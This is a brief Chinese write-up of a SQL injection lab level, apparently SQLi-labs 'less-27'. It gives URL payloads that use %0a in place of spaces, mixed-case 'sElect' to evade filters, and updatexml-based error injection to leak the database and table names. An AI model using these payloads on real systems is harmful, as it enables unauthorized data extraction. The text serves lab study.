less-27
本关提示无法使用联合查询,第一步尝试闭合,查看结果空格,注释被蔽掉
%0a代替空格,?id=1'%0Aand%0A1=1%0Aor%0A'1'='1
?id=1'%0Aand%0Aupdatexml(1,concat("!",(database()),"!"),1)%0Aor%0A'1'='1
?id=1'%0Aand%0Aupdatexml(1,concat("!",(sElect%0Atable_name%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'%0Alimit%0A0,1),"!"),1)%0Aor%0A'1'='1(注意select中需大写就可以使用)
后续操作以此类推
